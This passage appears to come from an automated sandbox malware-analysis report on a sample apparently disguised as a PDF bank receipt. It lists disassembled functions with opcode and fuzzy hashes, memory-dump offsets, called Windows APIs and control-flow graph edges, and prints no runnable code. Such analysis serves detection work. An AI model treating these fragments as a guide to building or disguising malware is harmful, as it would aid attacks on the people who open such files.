                                                                                                                • Instruction Fuzzy Hash: E0312671E012188FDB18CFAAD84469EBBB3EFC8311F14C0AAE409A7354DB315A95CF40
                                                                                                                Function 060CE8C1 Relevance: .1, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 768afd540a5be540ebceb2c6a0a99f5c3ab6f38ec1792caa157a63d92db7536d
                                                                                                                • Instruction ID: 50e228a53cb6a6026d3b90847c5b5385a5fba0e179383f934706dbceacf30e42
                                                                                                                • Opcode Fuzzy Hash: 768afd540a5be540ebceb2c6a0a99f5c3ab6f38ec1792caa157a63d92db7536d
                                                                                                                • Instruction Fuzzy Hash: BC21CD71E016199BEB58CFABD84479EFBF3EFC8210F04C1BAD818A6214DB7409558F51
                                                                                                                Function 082705A0 Relevance: .1, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 15eadca1c2962db3c9c35c0f5e09af0b40c8f8401fe17ab214b309ebce7c4ae8
                                                                                                                • Instruction ID: 7635b645cafb938d752e3925ba78932bfc5d5c17a7725d100ed7e4ce64a876b2
                                                                                                                • Opcode Fuzzy Hash: 15eadca1c2962db3c9c35c0f5e09af0b40c8f8401fe17ab214b309ebce7c4ae8
                                                                                                                • Instruction Fuzzy Hash: 9421F7B1E016198BDB18CFABC94469EFBF3AFC8310F14C17AD408A6258EB740A95CF50
                                                                                                                Function 0827A6E2 Relevance: .1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2159140bd7e26156c71e2106c88f49aebc695b4ab7bddaaf96ca1b41a22a322d
                                                                                                                • Instruction ID: d4c27a5c30e0f2136b12642385ede9865b981fcb07bc461ffef12df58057f701
                                                                                                                • Opcode Fuzzy Hash: 2159140bd7e26156c71e2106c88f49aebc695b4ab7bddaaf96ca1b41a22a322d
                                                                                                                • Instruction Fuzzy Hash: B4112871D156688BDB28CF6BD8046EEFBF7AFC9301F14C17AD409A6265DB700A468F80
                                                                                                                Function 0827E968 Relevance: 1.6, Strings: 1, Instructions: 366COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1011 827e968-827e97f 1012 827e981-827e986 1011->1012 1013 827e988-827e98e 1011->1013 1014 827e991-827e995 1012->1014 1013->1014 1015 827e997-827e99c 1014->1015 1016 827e99e-827e9a4 1014->1016 1017 827e9a7-827e9ab 1015->1017 1016->1017 1018 827e9cf-827e9d3 1017->1018 1019 827e9ad-827e9ca 1017->1019 1020 827e9f7-827ea02 1018->1020 1021 827e9d5-827e9f2 1018->1021 1031 827ebef-827ebf8 1019->1031 1022 827ea04-827ea07 1020->1022 1023 827ea0a-827ea10 1020->1023 1021->1031 1022->1023 1026 827ea16-827ea26 1023->1026 1027 827ebfb-827ee9e 1023->1027 1033 827ea4b-827ea70 1026->1033 1034 827ea28-827ea46 1026->1034 1041 827ea76-827ea7f 1033->1041 1042 827ebb8-827ebbd 1033->1042 1039 827ebaf-827ebb2 1034->1039 1039->1041 1039->1042 1041->1027 1044 827ea85-827ea9d 1041->1044 1042->1027 1043 827ebbf-827ebc2 1042->1043 1047 827ebc6-827ebc9 1043->1047 1048 827ebc4 1043->1048 1052 827eaaf-827eac6 1044->1052 1053 827ea9f-827eaa4 1044->1053 1047->1027 1049 827ebcb-827ebed 1047->1049 1048->1031 1049->1031 1062 827eace-827ead8 1052->1062 1063 827eac8 1052->1063 1053->1027 1055 827eaaa-827eaad 1053->1055 1055->1052 1057 827eadd-827eae2 1055->1057 1057->1027 1059 827eae8-827eaf7 1057->1059 1068 827eaff-827eb0f 1059->1068 1069 827eaf9 1059->1069 1062->1042 1063->1062 1068->1027 1073 827eb15-827eb18 1068->1073 1069->1068 1073->1027 1074 827eb1e-827eb21 1073->1074 1076 827eb23-827eb27 1074->1076 1077 827eb72-827eb84 1074->1077 1076->1027 1078 827eb2d-827eb33 1076->1078 1077->1039 1085 827eb86-827eb9b 1077->1085 1081 827eb35-827eb3b 1078->1081 1082 827eb44-827eb4a 1078->1082 1081->1027 1083 827eb41 1081->1083 1082->1027 1084 827eb50-827eb5c 1082->1084 1083->1082 1092 827eb64-827eb70 1084->1092 1090 827eba3-827ebad 1085->1090 1091 827eb9d 1085->1091 1090->1042 1091->1090 1092->1077
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q
                                                                                                                • API String ID: 0-1259897404
                                                                                                                • Opcode ID: ee6f88781d526347661ef4223f21ba0d94719b46af4b154887298c95523cd89e
                                                                                                                • Instruction ID: 895fb1198e4c83b1d769a050de0847813b4f768d7b581a6f27c27f34e37e5dcf
                                                                                                                • Opcode Fuzzy Hash: ee6f88781d526347661ef4223f21ba0d94719b46af4b154887298c95523cd89e
                                                                                                                • Instruction Fuzzy Hash: CDE1F974A00209DFCB05EFBAD580AAD7FB6FF88704F108558E80567369CB35AD45CB51
                                                                                                                Function 02CC5D77 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1119 2cc5d77-2cc5d9b 1120 2cc5da0-2cc5e61 CreateActCtxA 1119->1120 1122 2cc5e6a-2cc5ec4 1120->1122 1123 2cc5e63-2cc5e69 1120->1123 1130 2cc5ec6-2cc5ec9 1122->1130 1131 2cc5ed3-2cc5ed7 1122->1131 1123->1122 1130->1131 1132 2cc5ee8 1131->1132 1133 2cc5ed9-2cc5ee5 1131->1133 1135 2cc5ee9 1132->1135 1133->1132 1135->1135
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 02CC5E51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2042357903.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2cc0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 93c9be373e2fbfc8e85b596673f36e96704984c7fce37ce13f3cf9724405e38c
                                                                                                                • Instruction ID: a05b8e4c9608c806425510c3bb99d03e415ceae6108660ff2154a08581fff0c8
                                                                                                                • Opcode Fuzzy Hash: 93c9be373e2fbfc8e85b596673f36e96704984c7fce37ce13f3cf9724405e38c
                                                                                                                • Instruction Fuzzy Hash: 3F4111B1C00759CFDB14CFA9C884B8EBBB1FF49304F64806AD408AB251DBB5694ACF90
                                                                                                                Function 02CC4524 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1136 2cc4524-2cc5e61 CreateActCtxA 1139 2cc5e6a-2cc5ec4 1136->1139 1140 2cc5e63-2cc5e69 1136->1140 1147 2cc5ec6-2cc5ec9 1139->1147 1148 2cc5ed3-2cc5ed7 1139->1148 1140->1139 1147->1148 1149 2cc5ee8 1148->1149 1150 2cc5ed9-2cc5ee5 1148->1150 1152 2cc5ee9 1149->1152 1150->1149 1152->1152
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 02CC5E51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2042357903.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2cc0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 0db7a38ffde258f70e7d516c3ff056efd401891fc2662228a60d3617cd659112
                                                                                                                • Instruction ID: ec49d845313a07c8aae2b3a58e5275934a4b0616ee8ca44065189a728cb8486a
                                                                                                                • Opcode Fuzzy Hash: 0db7a38ffde258f70e7d516c3ff056efd401891fc2662228a60d3617cd659112
                                                                                                                • Instruction Fuzzy Hash: 3941F1B0C0065DCBDB24CFA9C884B9EBBF5BF49304F64806AD408BB254DBB56946CF90
                                                                                                                Function 060C8F88 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1153 60c8f88-60c8f9a 1154 60c8fa2-60c8fad 1153->1154 1155 60c8f9d call 60c8104 1153->1155 1156 60c8faf-60c8fbf 1154->1156 1157 60c8fc2-60c9054 CreateIconFromResourceEx 1154->1157 1155->1154 1161 60c905d-60c907a 1157->1161 1162 60c9056-60c905c 1157->1162 1162->1161
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFromIconResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668623891-0
                                                                                                                • Opcode ID: c56fd398faf3e62cfe354130513751088e6ae1ea529f6987c738d07be129a93d
                                                                                                                • Instruction ID: e839213ff947c5dc71eb78107bd0aa498d65ad7528ed37ab7c0063544d7221ca
                                                                                                                • Opcode Fuzzy Hash: c56fd398faf3e62cfe354130513751088e6ae1ea529f6987c738d07be129a93d
                                                                                                                • Instruction Fuzzy Hash: 1B318B719003599FCB11DFAAD840ADEBFF8EF09320F14805AFA54A7221C3359954DFA0
                                                                                                                Function 02CCE5D8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1165 2cce5d8-2cceadc DuplicateHandle 1167 2cceade-2cceae4 1165->1167 1168 2cceae5-2cceb02 1165->1168 1167->1168
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02CCEA0E,?,?,?,?,?), ref: 02CCEACF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2042357903.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2cc0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 6413589c6d67593f9b3330833292b4c29a96a9f665bb65a5016ce4748d192d13
                                                                                                                • Instruction ID: 5094f7dd19d6648cbbe9a60138fccc953f32c48a95f99af53f1fb84389df70b8
                                                                                                                • Opcode Fuzzy Hash: 6413589c6d67593f9b3330833292b4c29a96a9f665bb65a5016ce4748d192d13
                                                                                                                • Instruction Fuzzy Hash: 8C21E3B59002489FDB10CFAAD584AEEFFF8FB48310F14845AE918A3310D378A950CFA0
                                                                                                                Function 060C8104 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,060C8FA2,?,?,?,?,?), ref: 060C9047
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFromIconResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668623891-0
                                                                                                                • Opcode ID: ab4f877d83e6381bc620c74ffe665300f7ffe7a47ccb239d2f32bfafa22b2f04
                                                                                                                • Instruction ID: 8ec5e86404ec0e20798183efcbe58fff433e478a8fc2ca453f56180a3eebefc3
                                                                                                                • Opcode Fuzzy Hash: ab4f877d83e6381bc620c74ffe665300f7ffe7a47ccb239d2f32bfafa22b2f04
                                                                                                                • Instruction Fuzzy Hash: 6F113AB5800249DFDB10DF9AD844BEEBFF8EF48320F14841AE615A7250C379A950CFA4
                                                                                                                Function 02CCB072 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02CCB0E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2042357903.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2cc0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                • Opcode ID: 409b982d7a7485218065eeb666cca0350008ed95f348668aa86ca04ec5dd8ac1
                                                                                                                • Instruction ID: 1eaaa1cfa409057fd67495eef1866aeb364f33ee99041e5f2e83dd052be0e567
                                                                                                                • Opcode Fuzzy Hash: 409b982d7a7485218065eeb666cca0350008ed95f348668aa86ca04ec5dd8ac1
                                                                                                                • Instruction Fuzzy Hash: FB11BEB6800289CEDB10CFA9D5053EEBFF4EB05319F148499D599B7281C3395A44CBA1
                                                                                                                Function 02CCB080 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02CCB0E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2042357903.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2cc0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                • Opcode ID: feab5e48497a3e4f902cb91c9e6939b601df276d38bb6fa9dc2864f71b8bcc08
                                                                                                                • Instruction ID: 524562b1a34889f6e467cc09b6941ab127a27522cf445e58e05b2ab25c2792ef
                                                                                                                • Opcode Fuzzy Hash: feab5e48497a3e4f902cb91c9e6939b601df276d38bb6fa9dc2864f71b8bcc08
                                                                                                                • Instruction Fuzzy Hash: FE119DB5901388CEDB10CF99D5053EEBFF4EB05318F548499D599A7282C3395A44CBA2
                                                                                                                Function 02CCC760 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02CCC7C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2042357903.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2cc0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: df9efb1d2d77d473affa9d4ede702bd0b1329f250459ac8ef8b7198590728769
                                                                                                                • Instruction ID: fca409eb4f8ae21cf133f3c37fd4aaed8353759e3b7e3e6513c575fda799d39b
                                                                                                                • Opcode Fuzzy Hash: df9efb1d2d77d473affa9d4ede702bd0b1329f250459ac8ef8b7198590728769
                                                                                                                • Instruction Fuzzy Hash: CB11E0B6C002498FCB10DF9AD444ADEFBF8EF89314F24846AD519B7610D379A645CFA1
                                                                                                                Function 0827B222 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: r
                                                                                                                • API String ID: 0-1812594589
                                                                                                                • Opcode ID: 440c034dcfd7f474730c49240ad9ad61a21af7f547f5b379013ec048098da938
                                                                                                                • Instruction ID: 1123031a20fabe05ee9bf3278014880f75c60903fc0afba14b66473745276019
                                                                                                                • Opcode Fuzzy Hash: 440c034dcfd7f474730c49240ad9ad61a21af7f547f5b379013ec048098da938
                                                                                                                • Instruction Fuzzy Hash: 9661F634D25209DFCB04DF9AE4988ADFB79FF4A322B519159E41AA7202C730E9C1CB94
                                                                                                                Function 082797C0 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te]q
                                                                                                                • API String ID: 0-52440209
                                                                                                                • Opcode ID: 3e8c59e0583b063878200609bdc1564f25e36499793bdd38049a805f265e061e
                                                                                                                • Instruction ID: 0e30d2fbdceb4e9fc6dc78f676a0484ef2390662d325ee74cafe0dc4dd5960c9
                                                                                                                • Opcode Fuzzy Hash: 3e8c59e0583b063878200609bdc1564f25e36499793bdd38049a805f265e061e
                                                                                                                • Instruction Fuzzy Hash: 0C311570D193498BEB09DFAAD8856DDBFF2BF89301F14C02AC409AB259D7780986CB50
                                                                                                                Function 08279808 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te]q
                                                                                                                • API String ID: 0-52440209
                                                                                                                • Opcode ID: c39353cb130768fd1f5278aea1e715177c96869fe57f99a2db2ea56acd3dcb3e
                                                                                                                • Instruction ID: 988fae6e6e9afddd2aa9c102425d2c462b13384a7503d0bc0f96171d6904a6bb
                                                                                                                • Opcode Fuzzy Hash: c39353cb130768fd1f5278aea1e715177c96869fe57f99a2db2ea56acd3dcb3e
                                                                                                                • Instruction Fuzzy Hash: FC31F3B0D153488BEB08DFAAC9446EEBFF6AF89301F14C12AC419AB354DB744886CB50
                                                                                                                Function 082798BC Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te]q
                                                                                                                • API String ID: 0-52440209
                                                                                                                • Opcode ID: 93fb74602587782bd3b7bedf90fc3ef106d34f829b22e6e1ab5fae46c9221593
                                                                                                                • Instruction ID: 46cc6ac1ed8e3a1f2db26e7d774047fd0542a17da39332953b3f7c232cf366f3
                                                                                                                • Opcode Fuzzy Hash: 93fb74602587782bd3b7bedf90fc3ef106d34f829b22e6e1ab5fae46c9221593
                                                                                                                • Instruction Fuzzy Hash: 9D31B074E15209CFDB08CFEAC4849EDBBB6BF8D311F20906AD909AB325D7355945CB50
                                                                                                                Function 08279818 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te]q
                                                                                                                • API String ID: 0-52440209
                                                                                                                • Opcode ID: d3d5291dcac0440cb82b0cf7de1b7e76feac5101e2140424550b6010f9225eab
                                                                                                                • Instruction ID: e046fff2a755aa35485cf050c5d8ad1c1c9172618017a846a21c56704f9fcd61
                                                                                                                • Opcode Fuzzy Hash: d3d5291dcac0440cb82b0cf7de1b7e76feac5101e2140424550b6010f9225eab
                                                                                                                • Instruction Fuzzy Hash: C531E9B0D103188BDB08DFAAC9446DEFBF6BF89301F14C129D419AB354DB745886CB50
                                                                                                                Function 08271AA1 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ?H,a
                                                                                                                • API String ID: 0-4093759987
                                                                                                                • Opcode ID: 5df08842cc62566d4cf1fc4c481ac7c06c767289cb58c66be91fbcc2af4d2993
                                                                                                                • Instruction ID: 6a481f356e3b24a9f03595713ee9c3320da415cab1a74a6d34a179147478dbb0
                                                                                                                • Opcode Fuzzy Hash: 5df08842cc62566d4cf1fc4c481ac7c06c767289cb58c66be91fbcc2af4d2993
                                                                                                                • Instruction Fuzzy Hash: 72214874E11209EFDB08DFA9C585A9EFBF6FF88301F14C1AAD51897214E7309A21CB40
                                                                                                                Function 08274970 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: G'/.
                                                                                                                • API String ID: 0-3562003039
                                                                                                                • Opcode ID: 4cb727cf12b92eb95466d2e90b4f5616b95310963f9f816b17561a7e328ae569
                                                                                                                • Instruction ID: 358c05a306f784432ca02bd5952b30305f90159d7c8f3c6b54a0483cffea49eb
                                                                                                                • Opcode Fuzzy Hash: 4cb727cf12b92eb95466d2e90b4f5616b95310963f9f816b17561a7e328ae569
                                                                                                                • Instruction Fuzzy Hash: FD110630A2A38ACFCB1ADB65D940699BFB2DB83211F1482EAC455EB1A2D3344F51C759
                                                                                                                Function 082768EF Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: u|P
                                                                                                                • API String ID: 0-1764873574
                                                                                                                • Opcode ID: 6f7eb6df339b03f6ad3ca9c51afcf2098ced0a608c6eb5f2311d918a59524985
                                                                                                                • Instruction ID: 5d5a1f7158312f4f3d6ca0dc0786c3bf1c9ef82d98b7e7f7ef81a4af5d144622
                                                                                                                • Opcode Fuzzy Hash: 6f7eb6df339b03f6ad3ca9c51afcf2098ced0a608c6eb5f2311d918a59524985
                                                                                                                • Instruction Fuzzy Hash: A6114CB4E16209DFCB48CFA6C9416AEBFF2EF88300F2481AAD905E7354D6344B55CB55
                                                                                                                Function 060CB220 Relevance: 1.3, APIs: 1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,060CBC69,?,?), ref: 060CBE10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2045425047.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_60c0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: b82f0e7a7fa456a385f6b8b7be0c1ba8b27b3e7a8daaa8f1c59b4c3e8d876b28
                                                                                                                • Instruction ID: 53eb338f0977c0230bdd2148d999bc3b7b596f6e4202d2cef39fc89c87708b9c
                                                                                                                • Opcode Fuzzy Hash: b82f0e7a7fa456a385f6b8b7be0c1ba8b27b3e7a8daaa8f1c59b4c3e8d876b28
                                                                                                                • Instruction Fuzzy Hash: 3A1137B18043888FDB10DFA9D445BEEBFF4EF48320F14845AD598A7241D338A544CBA5
                                                                                                                Function 08276900 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: u|P
                                                                                                                • API String ID: 0-1764873574
                                                                                                                • Opcode ID: 4f08b64a3d3addad26e04bfeff88626c5cfb269bf41156522d38a6d4ffdfc492
                                                                                                                • Instruction ID: 3557ea4e22ede8f9af72297190952917d8da7d0d3cc8d14de1252831897e9c09
                                                                                                                • Opcode Fuzzy Hash: 4f08b64a3d3addad26e04bfeff88626c5cfb269bf41156522d38a6d4ffdfc492
                                                                                                                • Instruction Fuzzy Hash: A6114CB4E16609DFCB48CFAAC9416AEFBF6EB88301F24C06AC509E3304D6349B51CB45
                                                                                                                Function 0827CF38 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ]"4
                                                                                                                • API String ID: 0-3376221696
                                                                                                                • Opcode ID: dc185b9434a06ac716bd6f27189c35a665fcda126ffcd138fd53f6a58ce80063
